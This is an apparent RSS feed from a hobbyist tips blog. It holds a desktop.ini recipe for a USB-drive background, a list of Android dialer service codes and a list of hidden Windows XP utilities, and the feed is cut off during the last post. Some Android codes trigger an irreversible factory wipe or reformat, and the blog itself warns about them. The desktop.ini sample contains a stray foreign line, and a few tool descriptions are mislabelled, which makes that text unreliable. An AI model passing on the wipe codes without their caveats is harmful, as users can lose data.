<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>IndiCyborg</title><description></description><managingEditor>noreply@blogger.com (Akshay)</managingEditor><pubDate>Sat, 7 Mar 2026 05:47:42 -0800</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">114</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://indicyborg.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle/><itunes:category text="Technology"/><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>Add Background Wallpaper On Your Pendrive</title><link>http://indicyborg.blogspot.com/2012/09/add-background-wallpaper-on-your.html</link><category>Tips And Tricks</category><category>Usb</category><category>Windows</category><author>noreply@blogger.com (Akshay)</author><pubDate>Wed, 12 Sep 2012 04:47:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-6786374905846986154</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjptG4RiXgalTMapp-xlvhmhDD0KStmwogWPjdRClf0tEPJ-H5bEPm3B7XbDgGEw5G4j56EXlJXI34jNWoY3oIHeyXT6dvZdWu3v1fmQrcikVcNFIsuwIg7-JpUKgFKbeC1bb6sr77xCQ/s1600/Devil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjptG4RiXgalTMapp-xlvhmhDD0KStmwogWPjdRClf0tEPJ-H5bEPm3B7XbDgGEw5G4j56EXlJXI34jNWoY3oIHeyXT6dvZdWu3v1fmQrcikVcNFIsuwIg7-JpUKgFKbeC1bb6sr77xCQ/s400/Devil.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
We all might have&lt;b&gt; set background images&lt;/b&gt; for the&lt;b&gt; Local drives in Windows Xp&lt;/b&gt;. But you might not have set &lt;b&gt;background picture&lt;/b&gt; for your &lt;b&gt;pen-drive&lt;/b&gt;. It’s a &lt;b&gt;very simple hack&lt;/b&gt; so give it a try after reading this post,&lt;br /&gt;
All you need to do is, just &lt;b&gt;Copy &amp;amp; Paste&lt;/b&gt; the below code to &lt;b&gt;notepad&lt;/b&gt;,then save it as “&lt;b style="color: red;"&gt;desktop.ini&lt;/b&gt;”&lt;br /&gt;
&lt;br /&gt;
[.ShellClassInfo]&lt;br /&gt;
IconFile=%SystemRoot%system32SHELL32.dll&lt;br /&gt;
IconIndex=127&lt;br /&gt;
ConfirmFileOp=0&lt;br /&gt;
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]&lt;br /&gt;
Attributes=1&lt;br /&gt;
IconArea_Image=”YourPictureName.jpg”&lt;br /&gt;
IconArea_Text=”0xFFFFFF”&lt;br /&gt;
VeBRA sources – don’t delete the tag above, it’s there for XXXXX purposes -&lt;br /&gt;
[ExtShellFolderViews]&lt;br /&gt;
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}&lt;br /&gt;
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}&lt;br /&gt;
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]&lt;br /&gt;
PersistMoniker=Folder.htt&lt;br /&gt;
PersistMonikerPreview=%WebDir%folder.bmp&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Some Information On Above Code:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Where “&lt;b style="color: red;"&gt;YourPictureName.jpg&lt;/b&gt;” is, delete that and replace with your picture name for example “&lt;b style="color: red;"&gt;FreeBSD.bmp&lt;/b&gt;”&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Note:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Please check that Picture format &lt;b&gt;(.jpg , .bmp, .gif)&lt;/b&gt; properly else this hack won’t work.&lt;br /&gt;
&lt;br /&gt;
If your Picture is&lt;b&gt; white colour&lt;/b&gt; then folder names will not be clear so change the IconArea_Text=”&lt;b style="color: red;"&gt;0xFFFFFF&lt;/b&gt;” to IconArea_Text=”&lt;b style="color: red;"&gt;0x000000&lt;/b&gt;”&lt;br /&gt;
&lt;br /&gt;
Save the notepad as “&lt;b&gt;desktop.ini&lt;/b&gt;”.&lt;br /&gt;
&lt;br /&gt;
Place both your notepad file (i.e) &lt;b&gt;desktop.ini&lt;/b&gt; and your&lt;b&gt; picture&lt;/b&gt; in Pendrive.&lt;br /&gt;
&lt;br /&gt;
Set the above files attributes as&lt;b&gt; Hidden.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Refresh(F5)&lt;/b&gt; and Enjoy with your new background.&lt;br /&gt;
&lt;br /&gt;
You can also this on your &lt;b&gt;Windows Xp Local drives (C,D,E,F…)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visting :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;span style="color: red;"&gt;Indicyborg&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjptG4RiXgalTMapp-xlvhmhDD0KStmwogWPjdRClf0tEPJ-H5bEPm3B7XbDgGEw5G4j56EXlJXI34jNWoY3oIHeyXT6dvZdWu3v1fmQrcikVcNFIsuwIg7-JpUKgFKbeC1bb6sr77xCQ/s72-c/Devil.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></item><item><title>Secret Hack Codes For Android Mobile Phones</title><link>http://indicyborg.blogspot.com/2012/09/secret-hack-codes-for-android-mobile.html</link><category>Android</category><category>Hidden</category><category>Mobile</category><category>Tips And Tricks</category><author>noreply@blogger.com (Akshay)</author><pubDate>Sat, 8 Sep 2012 11:33:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-330689713092530719</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlhrbnjnibAE95YcidRCRE7-PBgtT5MKT88UuwlLWEIyQD5JV78_zqJU2-R8VrFxsHnjobjSSacbVa8IUEd43RnQikHfbtTMrBl5nHso1EMLzAji_OXNlUJYci-PjQHHGE0Uc6k8HUhg/s1600/android-secret-codes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="385" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlhrbnjnibAE95YcidRCRE7-PBgtT5MKT88UuwlLWEIyQD5JV78_zqJU2-R8VrFxsHnjobjSSacbVa8IUEd43RnQikHfbtTMrBl5nHso1EMLzAji_OXNlUJYci-PjQHHGE0Uc6k8HUhg/s640/android-secret-codes.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
So in this topic you will come to know all the hidden secret codes which can be used in your Google Android phone . From these secret codes you would be able to access all those things in your Phone which are not accessible by default.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
1.&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="color: red;"&gt;*#*#4636#*#*&lt;/span&gt;&lt;br /&gt;
This Code provides information about your phone and battery. It shows following 4 menus on screen:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Phone information&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Battery information&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Usage statistics&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Battery history &lt;br /&gt;
&lt;br /&gt;
2.&amp;nbsp; &lt;span style="color: red;"&gt;*#*#7780#*#*&lt;/span&gt;&lt;br /&gt;
This code is used for a factory data reset. It will remove following things:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Google account settings stored in your phone .&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; System and application data and settings .&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Downloaded applications .&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;It’ll NOT remove:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Current system software and bundled applications.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; SD card files e.g. photos, music files, etc.&lt;br /&gt;
&lt;br style="color: red;" /&gt;&lt;span style="color: red;"&gt;NOTE: Once you apply code, you get a prompt screen asking you to click on “Reset phone” button. So you get a chance to cancel your operation. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
3.&lt;span style="color: red;"&gt; *2767*3855# &lt;/span&gt;&lt;br /&gt;
This code is used for factory format. It’ll remove all files and settings including the internal memory storage. It’ll also reinstall the phone firmware.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;NOTE : Once you apply this code, there is no way to cancel this operation unless you remove the battery from your phone. So THINK TWICE BEFORE APPLYING THIS CODE .&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
4. &lt;span style="color: red;"&gt;*#*#34971539#*#*&lt;/span&gt;&lt;br /&gt;
This code shows information about Your&amp;nbsp; Phone’s Camera .It shows 4 following options :&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Update camera firmware in image (Don’t dare try this option)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Update camera firmware in SD card&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Get camera firmware version&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Get firmware update count&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;Warning : Never Use the first option as it can harm your phone’s camera and your camera will stop working . Don’t Try It .&lt;/span&gt;&lt;br style="color: red;" /&gt;&lt;br /&gt;
5 . &lt;span style="color: red;"&gt;*#*#7594#*#*&lt;/span&gt;&lt;br /&gt;
This is the popular one . This code let you change the “End Call / Power” button action in your phone.By default, if you long press the button, it shows a screen asking you to select any option from Silent mode, Airplane mode and Power off.&lt;br /&gt;
&lt;br /&gt;
6. &lt;span style="color: red;"&gt;*#*#273283*255*663282*#*#*&lt;/span&gt;&lt;br /&gt;
This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.&lt;span style="color: red;"&gt; This is very usefull .&amp;nbsp; Isn’t it ?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
7.&amp;nbsp; &lt;span style="color: red;"&gt;*#*#197328640#*#*&lt;/span&gt;&lt;br /&gt;
This code is used to enter into Service mode. You can run various tests and change settings in the service mode.&lt;br /&gt;
&lt;br /&gt;
Some&amp;nbsp; &lt;span style="color: red;"&gt;Codes For WLAN, GPS and Bluetooth Test Codes:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#232339#*#*&lt;/span&gt; OR&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#526#*#* &lt;/span&gt;OR&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#528#*#*&lt;/span&gt; – WLAN test (Use “Menu” button to start various tests)&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#232338#*#*&lt;/span&gt; – Shows WiFi MAC address&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#1472365#*#*&lt;/span&gt; – GPS test&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#1575#*#* &lt;/span&gt;– Another GPS test&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#232331#*#* &lt;/span&gt;– Bluetooth test&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#232337#*#&lt;/span&gt; – Shows Bluetooth device address&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: blue;"&gt;Some Codes to get Firmware version information:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#4986*2650468#*#*&lt;/span&gt; – PDA, Phone, H/W, RFCallDate&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;*#*#1234#*#*&lt;/span&gt; – PDA and Phone&lt;br /&gt;
&lt;br /&gt;
*#*#1111#*#* – FTA SW Version&lt;br /&gt;
&lt;br /&gt;
*#*#2222#*#* – FTA HW Version&lt;br /&gt;
&lt;br /&gt;
*#*#44336#*#* – PDA, Phone, CSC, Build Time, Changelist number&lt;br /&gt;
&lt;br /&gt;
Some Codes to launch various Factory Tests:&lt;br /&gt;
&lt;br /&gt;
*#*#0283#*#* – Packet Loopback&lt;br /&gt;
&lt;br /&gt;
*#*#2664#*#* – Touch screen test&lt;br /&gt;
&lt;br /&gt;
*#*#0673#*#* OR&lt;br /&gt;
*#*#0289#*#* – Melody test&lt;br /&gt;
&lt;br /&gt;
*#*#3264#*#* – RAM version&lt;br /&gt;
&lt;br /&gt;
*#*#2663#*#* – Touch screen version&lt;br /&gt;
&lt;br /&gt;
*#*#0*#*#* – LCD test&lt;br /&gt;
&lt;br /&gt;
*#*#0588#*#* – Proximity sensor test&lt;br /&gt;
&lt;br /&gt;
*#*#0842#*#* – Device test (Vibration test and BackLight test)&lt;/b&gt;&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Note :&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Try all these codes at your own Risk . We’ll not be responsible for the use or misuse of this information, including loss of data or hardware damage .&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;b&gt;Thanks For Reading&lt;/b&gt;&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Keep Visting :-&lt;/span&gt;&lt;a href="http://www.indicyborg.blogspot.in/"&gt; IndiCyborg &lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlhrbnjnibAE95YcidRCRE7-PBgtT5MKT88UuwlLWEIyQD5JV78_zqJU2-R8VrFxsHnjobjSSacbVa8IUEd43RnQikHfbtTMrBl5nHso1EMLzAji_OXNlUJYci-PjQHHGE0Uc6k8HUhg/s72-c/android-secret-codes.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>Lists of Hidden Secret Applications/Programs of Windows XP</title><link>http://indicyborg.blogspot.com/2012/09/lists-of-hidden-secret.html</link><category>Hidden</category><category>Tips And Tricks</category><category>Windows</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 7 Sep 2012 05:18:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-4598344661389583149</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5l7dRUlrAO9Dqp5xdZxI9ZGB0rDVaG90oFNbKvpnTmpbKEz4_yvGzJf2CJn-rajQ7kKX2i5NmkHcRcCZsj1ZQGChP_3A2pAZ0asqLdqfC-GNdE0TOo5N26emgPhoJq511S71oPdHrUw/s1600/hidden-programs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5l7dRUlrAO9Dqp5xdZxI9ZGB0rDVaG90oFNbKvpnTmpbKEz4_yvGzJf2CJn-rajQ7kKX2i5NmkHcRcCZsj1ZQGChP_3A2pAZ0asqLdqfC-GNdE0TOo5N26emgPhoJq511S71oPdHrUw/s400/hidden-programs.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;Lots of hidden application or programs exist in your Windows XP operating system. These hidden applications are really very useful and can saves much time when you really know these applications utility or application. Microsoft never tell you these applications / programs description. All these hidden programs are really powerful for similar activities like registry editing, group policy editing, communicating with others etc. This page presents lots of hidden secret programs / application and you will be glad knowing these hidden applications activities.&lt;br /&gt;
Lists of Hidden Secret Applications / Programs of Windows XP:&lt;br /&gt;
&lt;br /&gt;
In the following paragraphs, you will find 20+ hidden secret applications or programs of Microsoft Windows XP operating system:&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Private Character Editor: &lt;/b&gt;Hidden Font Editor Private Character Editor is used to create unique letters and logos for your font library according to your own choice. This program is totally for designing icons and Characters.&lt;br /&gt;
&lt;br /&gt;
Instructions for Private Character Editor: Click on Start menuand click select Run In the "Run" window, type EUDCEDIT and hit Enter key of your keyboard..&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;IExpress: &lt;/b&gt;Hidden Install Creator IExpress program is for converting your files to EXECUTABLE files. This technology is designed to simplify creation of a setup program. Using the step-by-step IExpress Wizard, you can create self-extracting files that automatically run the setup program contained inside. The setup program can be an .inf file or an executable program. IExpress technology automatically removes the setup files after installation, saving the user time and frustration.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for IExpress:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Click on Start menu and click select Run 2. In the "Run" window, type iexpress and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Disk Cleanup:&lt;/b&gt; Cleaning Harddisk ,This program is used for cleaning harddisk to offer more space to your hard-disk.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Disk Cleanup:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Click on Start menu and click select Run 2. In the "Run" window, type cleanmgr and hit Enter key of your keyboard.&lt;br /&gt;
&lt;b style="color: red;"&gt;&lt;br /&gt;
MS-DOS Editor:&lt;/b&gt; Hidden Text Editor Windows XP comes with another text editor besides Notepad - it's called the MS-DOS Editor is another text editor like Notepad and it's commonly referred to simply as Edit. You can use it as like Notepad. Moreover, it offers many more features such as the ability to work with multiple text files and change the background and text colors.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt8mNv6wfHJ6GiSIqQpnP1AYgTrW3-dmwJDxqaOsmZ0XfxatGSY2ySEaRinwyofKUN951-dlUd-BeEAvguuSd2hejhyphenhyphenFDzzVGQHdsD51m69NzmDmxBLR51cSUdhn74hNtjkhMEx8P1kg/s1600/Hiddern+secret.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt8mNv6wfHJ6GiSIqQpnP1AYgTrW3-dmwJDxqaOsmZ0XfxatGSY2ySEaRinwyofKUN951-dlUd-BeEAvguuSd2hejhyphenhyphenFDzzVGQHdsD51m69NzmDmxBLR51cSUdhn74hNtjkhMEx8P1kg/s400/Hiddern+secret.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for MS-DOS Editor:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1)&lt;/b&gt;Click on Start menu and click select Run .&lt;br /&gt;
&lt;b&gt;2)&lt;/b&gt; In the "Run" window, type edit and hit Enter key of your keyboard.&lt;br /&gt;
&lt;b style="color: red;"&gt;&lt;br /&gt;
Netmeeting: &lt;/b&gt;Hidden Internet Conference Application NetMeeting of Windows XP can deliver a complete Internet conferencing solution for all Windows users with multi-point data conferencing, text chat, whiteboard, and file transfer, as well as point-to-point audio and video.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Netmeeting:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Click on Start menu and click select Run&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;In the "Run" window, type conf and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Windows Chat: &lt;/b&gt;Hidden Windows ChatProgram Windows Chat can be used to communicate with someone on another computer. But both computers must be connected to the same network (for&lt;br /&gt;
example, a local area network [LAN] or the Internet) and each computer must be running a similar protocol, such as TCP/IP. So, you can communicate with others easily.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Windows Chat:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Click on Start menu and click select Run 2. In the "Run" window, type winchat and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Windows Media Player 5.1: &lt;/b&gt;Hidden Windows Media Player Do you know that there is is windows media player 5.1 in your windows XP. You can use it to listen music.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Windows Windows Media Player 5.1:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Click on Start menu and click select Run&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;In the "Run" window, type mplay32 and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Windows Media Player 6.4 : &lt;/b&gt;Hidden Windows Media Player This is another secret of Windows XP. Here you can find Windows Media Player 6.4 (classic) to play your media files.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Windows Media Player 6.4:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Click on Start menu and click select Run 2. In the "Run" window, type mplayer2 and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Note:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Windows Media Player 6.4 (Classic) is installed along with Windows Media Player 7. The only update is that it now supports the latest codecs.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Dr Watson:&lt;/b&gt; Troubleshooting tool This program Is for repairing problems in Windows&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Dr Watson:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Click on Start menu and click select Run 2. In the "Run" window, type drwtsn32 and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Clipboard Viewer: &lt;/b&gt;Windows ClipboardViewing This program is for viewing contents of Windows clipboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Clipboard Viewer:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt; Click on Start menu and click select Run 2. In the "Run" window, type clipbrd and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;DirectX diagnosis:&lt;/b&gt; Diagnose DirectX, video and sound This program is for viewing contents of Windows clipboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for DirectX diagnosis:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2. In the "Run" window, type dxdiag and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Character Map:&lt;/b&gt; Find unusual characters This program is used for finding unusual characters.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Instructions for Character Map:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: black;"&gt;1. &lt;/span&gt;&lt;/b&gt;Click on Start menu and click select Run 2. In the "Run" window, type charmap and hit Enter key of your keyboard&lt;br /&gt;
&lt;b style="color: red;"&gt;&lt;br /&gt;
Mcft Synchronization Manager: &lt;/b&gt;File synchronization on the network This program is very helpful which allows synchronization of files on the network for when working offline. But this program is apparently undocumented.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Mcft Synchronization Manager:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type mobsync and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;ODBC Data Source Administrator&lt;/b&gt;: If you like to do with databases, you can use this hidden program of Windows XP.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for ODBC Data Source Administrator:&lt;/b&gt;&lt;br /&gt;
1. Click on Start menu and click select Run 2. In the "Run" window, type odbcad32 and hit Enter key of your keyboard&lt;br /&gt;
&lt;b style="color: red;"&gt;&lt;br /&gt;
Object Packager: &lt;/b&gt;With this secret Windows XP program, you can do with packaging objects for insertion in files, appears to have comprehensive help files&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Object Packager:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type packager and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Group Policy Editor:&lt;/b&gt; This program is used to manage group policies, and permissions&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Group Policy Editor:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;Click on Start menu and click select Run 2. In the "Run" window, type gpedit.msc and hit Enter key of your keyboard&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;System configuration: &lt;/span&gt;&lt;/b&gt;This program is used to control starup programs.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;Instructions for System configuration:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type msconfig and hit Enter key of your keyboard.&lt;br /&gt;
&lt;b&gt;&lt;br style="color: red;" /&gt;&lt;span style="color: red;"&gt;Driver Verifier Manager:&lt;/span&gt;&lt;/b&gt; It seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Driver Verifier Manager :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type verifier and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Microsoft Telnet Client: &lt;/b&gt;This program is used to remotely access to any device.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Microsoft Telnet Client:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type telnet and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;System Monitor:&lt;/b&gt; System Monitor is very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for System Monitor:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type perfmon and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;Program Manager&lt;/span&gt;&lt;b style="color: red;"&gt;:&lt;/b&gt; Program Manager is a program that can be used as Legacy Windows 3.x desktop shell.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Program Manager:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type progman and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;Syskey :&lt;/span&gt;&lt;/b&gt; Secures XP Account database Syskey secures XP account database. Use Syskey with care, it's virtually undocumented but it appears to encrypt all passwords&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;&amp;nbsp;Instructions for Syskey:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type syskey and hit Enter key of your keyboard.&lt;br /&gt;
